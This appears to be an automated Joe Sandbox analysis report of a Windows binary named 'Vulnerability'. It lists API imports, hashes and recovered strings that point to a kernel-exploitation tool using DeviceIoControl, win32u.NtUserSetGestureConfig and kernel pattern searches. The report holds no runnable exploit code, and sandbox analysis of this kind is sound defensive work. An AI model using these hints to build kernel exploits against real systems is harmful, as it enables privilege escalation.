                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 4b9acf106bb3b219ab338e2df5011473eafeadde68a8731fcdb4d05657c6905c
                                                                                          • Instruction ID: 373399ea74c98b68310ea77aebd5134f820f13a28447e84639d1d9a4d3768fe7
                                                                                          • Opcode Fuzzy Hash: 4b9acf106bb3b219ab338e2df5011473eafeadde68a8731fcdb4d05657c6905c
                                                                                          • Instruction Fuzzy Hash: AC516B76B08B8189EB00EF60E4402AABBB1FB487ACF948036DE4D13759DE3CD249C354
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
Similarity
• API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
• String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
• API String ID: 2058718191-1835519504
• Opcode ID: 7f7072a78527782ad7cb3b54a6a444e447d352b78351a5178439e0cb6da2d73e
• Instruction ID: 43e043ddf88ee36c9081f4821c72d8048cc612a61100010004a1b722847de72c
• Opcode Fuzzy Hash: 7f7072a78527782ad7cb3b54a6a444e447d352b78351a5178439e0cb6da2d73e
• Instruction Fuzzy Hash: 75518E76B18B8199EB00EF60E4502A9BBB5FB4879CF949036DE4D17758DE3CD209C360
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
• Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
Similarity
• API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
• String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
• API String ID: 2058718191-1835519504
• Opcode ID: f0f617d7adf2d206aa13789971f507a0a69f0b8330848dee14faf78aa38ec60c
• Instruction ID: d9cb3d686a33e456bd08a87c5f9beafc1dd13b4983bebf0516df03747c23df66
• Opcode Fuzzy Hash: f0f617d7adf2d206aa13789971f507a0a69f0b8330848dee14faf78aa38ec60c
• Instruction Fuzzy Hash: 69516D36B18B8199EB00EF60E4502A9BBB5FB487ACF948036DE4D17759DE3CD259C320
APIs
• GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,FFFFFFFF,?), ref: 00007FF7CC41BF8C
• ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,FFFFFFFF,?), ref: 00007FF7CC41BFB4
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,FFFFFFFF,?), ref: 00007FF7CC41BFED
• DeviceIoControl.KERNEL32 ref: 00007FF7CC41C07B
• DeviceIoControl.KERNEL32 ref: 00007FF7CC41C12F
Strings
Memory Dump Source
• Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
Similarity
• API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
• String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
• API String ID: 2058718191-1835519504
• Opcode ID: c93f71661edbf01c8d4ae4040cb6f1ce5bf552ffba1e795d2700228143497dab
• Instruction ID: 2ad26f48ea661619dab0e3c621bc04e38bbc6cc7aff8730c20e7dd16024786fc
• Opcode Fuzzy Hash: c93f71661edbf01c8d4ae4040cb6f1ce5bf552ffba1e795d2700228143497dab
• Instruction Fuzzy Hash: 9B517F72B18B8198EB00EF60E8502A9BBB5FB4879CF948036DD4D17755DE3CD219C724
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
Similarity
• API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
• String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
• API String ID: 2058718191-1835519504
• Opcode ID: 61943f61cf7b1be6646eabcb6d8571008b25b447d8ea4ca38e38a054b2f30144
• Instruction ID: 97c8037f0dc94d69441a9fb5c7227d2cbe45767e917202ac03f05428823bd23f
• Opcode Fuzzy Hash: 61943f61cf7b1be6646eabcb6d8571008b25b447d8ea4ca38e38a054b2f30144
• Instruction Fuzzy Hash: 06516072B18B8199E700DF60E4506A9BBB5BB487ACF948036DD8D13B19DE3CD219C760
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
Similarity
• API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
• String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
• API String ID: 2058718191-1835519504
• Opcode ID: c095498fd2c6b1355e408e7f23fe90ed531437436c025c02fd8c0596c6b1ccae
• Instruction ID: d1ff98752669f3762a195d006508cfe1baff74d5ce557347e5ff772a9ef79847
• Opcode Fuzzy Hash: c095498fd2c6b1355e408e7f23fe90ed531437436c025c02fd8c0596c6b1ccae
• Instruction Fuzzy Hash: 1F516D36B18B8298EB10EF60E4446A9BBB5FB4879CF948036DE4D17759DE3CD219C350
APIs
• GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41AA6F
• ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41AA97
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41AAD1
• DeviceIoControl.KERNEL32 ref: 00007FF7CC41AB5B
• DeviceIoControl.KERNEL32 ref: 00007FF7CC41AC0D
Strings
Memory Dump Source
• Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
Similarity
• API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
• String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
• API String ID: 2058718191-1835519504
• Opcode ID: 2cda43178b61f0acd55cd3896cf86487f5febb23219e759162b88f261f6b8468
• Instruction ID: 54d652fc43d3c4531823b0f541ce85e305ef356186b9e866b662f973ea38b5cf
• Opcode Fuzzy Hash: 2cda43178b61f0acd55cd3896cf86487f5febb23219e759162b88f261f6b8468
• Instruction Fuzzy Hash: A4515E72A18B8199E700DF20E8502A9BBB5FB487ACF948136DE8D17719DF3CD259C350
APIs
• ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41E79D
• ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41E7D6
  • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
  • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
  • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
  • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
  • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
  • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
Strings
Memory Dump Source
• Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
Similarity
• API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@?good@ios_base@std@@U?$char_traits@_V01@@W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
• String ID: [+] Fixing stack cookie$[+] Load config directory wasn't found, probably StackCookie not defined, fix cookie skipped$[+] StackCookie not defined, fix cookie skipped$[-] StackCookie already fixed!? this probably wrong
• API String ID: 310790477-4185774449
• Opcode ID: 7594b96437ee2850946f2cd7182346ddda8625129cf03cdac55c4b0f2de49b66
• Instruction ID: aef06b07c66e9673f8a7f6ff3afca920880d05d8bb9dcad13f402cb8bbb908e1
• Opcode Fuzzy Hash: 7594b96437ee2850946f2cd7182346ddda8625129cf03cdac55c4b0f2de49b66
• Instruction Fuzzy Hash: 90317025F19BC281EA40FF15E895168AB61FF89BA8FC4A036D98E43715DF3CD295C720
APIs
  • Part of subcall function 00007FF7CC420B10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC420C0C
• _CxxThrowException.VCRUNTIME140 ref: 00007FF7CC4212D3
• ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7CC421330
• ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF7CC42133E
• ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140 ref: 00007FF7CC421311
  • Part of subcall function 00007FF7CC41A3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A4B7
• ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC421363
  • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
  • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
  • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
  • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
  • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
  • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
Strings
Memory Dump Source
• Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
Similarity
• API ID: U?$char_traits@_W@std@@@std@@$V01@$??6?$basic_ostream@_$?good@ios_base@std@@D@std@@@std@@U?$char_traits@$??6?$basic_ostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputc@?$basic_streambuf@_?uncaught_exception@std@@ExceptionOsfx@?$basic_ostream@_ThrowV01@@V12@V21@@Vios_base@1@_invalid_parameter_noinfo_noreturn
• String ID: by 0x$[!!] Crash$[!!] Crash at addr 0x$exists
• API String ID: 4130559589-3783130642
• Opcode ID: 080aeb56520599b7071670a4975e9314084b0c525a58dfc8b32ff2943dab44e4
• Instruction ID: e63d83a090d6d845d348095184d0a2636b54f3e9edadaf53f085a6f25a0e3acb
• Opcode Fuzzy Hash: 080aeb56520599b7071670a4975e9314084b0c525a58dfc8b32ff2943dab44e4
• Instruction Fuzzy Hash: FF218051E18AC681FA14FF15E8523B8AB21FF84BA8F84D031D94D43659EF2CE785C320
APIs
• __std_fs_code_page.MSVCPRT ref: 00007FF7CC420C9F
  • Part of subcall function 00007FF7CC423948: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF7CC420CA4), ref: 00007FF7CC42394C
  • Part of subcall function 00007FF7CC423948: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF7CC420CA4), ref: 00007FF7CC42395B
• memmove.VCRUNTIME140 ref: 00007FF7CC420D6F
• memmove.VCRUNTIME140 ref: 00007FF7CC420E4F
• _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC420E5F
• _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC420EDD
• _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC420F2B
Strings
Memory Dump Source
• Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$memmove$ApisFile___lc_codepage_func__std_fs_code_page
• String ID: ", "$: "
• API String ID: 3155750461-747220369
• Opcode ID: fee7c37069f084fdb3fcbd432b07c9ad3f7f9eaf3580db1ef9395aa38425d06b
• Instruction ID: d61610523bbeb81b259dfa57d4fe990adc80b84d98d01d1b3ac414f135d38f2d
• Opcode Fuzzy Hash: fee7c37069f084fdb3fcbd432b07c9ad3f7f9eaf3580db1ef9395aa38425d06b
• Instruction Fuzzy Hash: D091AE72B04B8185EB14EF65E4413ACA7B2EB48BACF808531DE5E57B99DF38D291C350
APIs
• ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,?,00000000,?,00007FF7CC41EA7F,?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EF19
• ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EF39
• ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EF49
• ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EF96
• ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EFBD
• ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EFDE
• ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41F024
• ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41F02B
• ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41F038
Memory Dump Source
• Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                                                          • String ID:
                                                                                          • API String ID: 3858555242-0
                                                                                          • Opcode ID: 6bc19da90b3a22a95d9b41eedf678c2b399e3105eb9b11cf846f221ea2204440
                                                                                          • Instruction ID: 2de4af32cf2e89d6b26d9f6554cb882bd18adbe29b5b6cd7a5fc463f1459f959
                                                                                          • Opcode Fuzzy Hash: 6bc19da90b3a22a95d9b41eedf678c2b399e3105eb9b11cf846f221ea2204440
                                                                                          • Instruction Fuzzy Hash: BA515736608A8181EB209F19E594638EFA0FF85FA9B65C531DE9E437A1CF3DD5468310
                                                                                          APIs
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D435
                                                                                          • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D455
                                                                                          • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D465
                                                                                          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D4AC
                                                                                          • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D4D9
                                                                                          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D4FA
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D540
                                                                                          • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D547
                                                                                          • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7CC411E19), ref: 00007FF7CC41D554
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                                                          • String ID:
                                                                                          • API String ID: 3858555242-0
                                                                                          • Opcode ID: 3a3d278f9abfa924c7819ac86336879c49577fd7e6b5cdeb5568fe49040b45a1
                                                                                          • Instruction ID: 9daa4ab332125fc90052bd884a999afbf396c6d8e19bbe42f7438bdc7b5f902a
                                                                                          • Opcode Fuzzy Hash: 3a3d278f9abfa924c7819ac86336879c49577fd7e6b5cdeb5568fe49040b45a1
                                                                                          • Instruction Fuzzy Hash: A6514672608A8181EF61EF1AD5D0238EBA0EF44FA9BA5C571CE8E43761CF3DE5468310
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$ControlDevicememcmp
                                                                                          • String ID: 0$[-] Can't find section$[-] Can't read module headers
                                                                                          • API String ID: 3070867233-813957328
                                                                                          • Opcode ID: f9ac27eec31af94f4a33965b90ed7a46de1e451c401fcb3802898bd7dce6e1ae
                                                                                          • Instruction ID: e505aad65220157125dae13d6b82d283a35120affa38918d944f61463eddac8e
                                                                                          • Opcode Fuzzy Hash: f9ac27eec31af94f4a33965b90ed7a46de1e451c401fcb3802898bd7dce6e1ae
                                                                                          • Instruction Fuzzy Hash: DE51A432A187C681DB209F15E4402BAEBA4FF857A8FA48135EADD43799DF7CD681C710
                                                                                          APIs
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417B4D
                                                                                          • memset.VCRUNTIME140 ref: 00007FF7CC417B7F
                                                                                            • Part of subcall function 00007FF7CC415E00: DeviceIoControl.KERNEL32 ref: 00007FF7CC415E9B
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417C28
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$ControlDevicememset
                                                                                          • String ID: [-] Can't find pattern$[-] Can't find pattern, Too big section$[-] No module address to find pattern$[-] Read failed in FindPatternAtKernel
                                                                                          • API String ID: 1687902784-521562947
                                                                                          • Opcode ID: 58557a54fd5ba6f0c641e890c273fe0d465d7dad3583469940d1ef5fc8e8662b
                                                                                          • Instruction ID: 00eef32dd26c053e8512a3922735d43997a05a91835eee85c32566942df6db5a
                                                                                          • Opcode Fuzzy Hash: 58557a54fd5ba6f0c641e890c273fe0d465d7dad3583469940d1ef5fc8e8662b
                                                                                          • Instruction Fuzzy Hash: CC41AF61E086C640FA21AF11A8112B9EE61AF45BFCFE5C131ED8D07696EE3CE7458220
                                                                                          APIs
                                                                                          • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC423529
                                                                                          • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC423551
                                                                                          • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC4235B8
                                                                                          • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC4235E1
                                                                                          • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC423601
                                                                                          • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC42364A
                                                                                          • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC423691
                                                                                          • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC4236D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@$?sgetc@?$basic_streambuf@$?sbumpc@?$basic_streambuf@
                                                                                          • String ID:
                                                                                          • API String ID: 2679766405-0
                                                                                          • Opcode ID: 0e536adec6e8f796df28328185aa6b3c9b012cd8468e90a20fd556225c24086d
                                                                                          • Instruction ID: 123419c217040758bac1cfc9929ff01747a387243699e1e2f8191fde779d8e3e
                                                                                          • Opcode Fuzzy Hash: 0e536adec6e8f796df28328185aa6b3c9b012cd8468e90a20fd556225c24086d
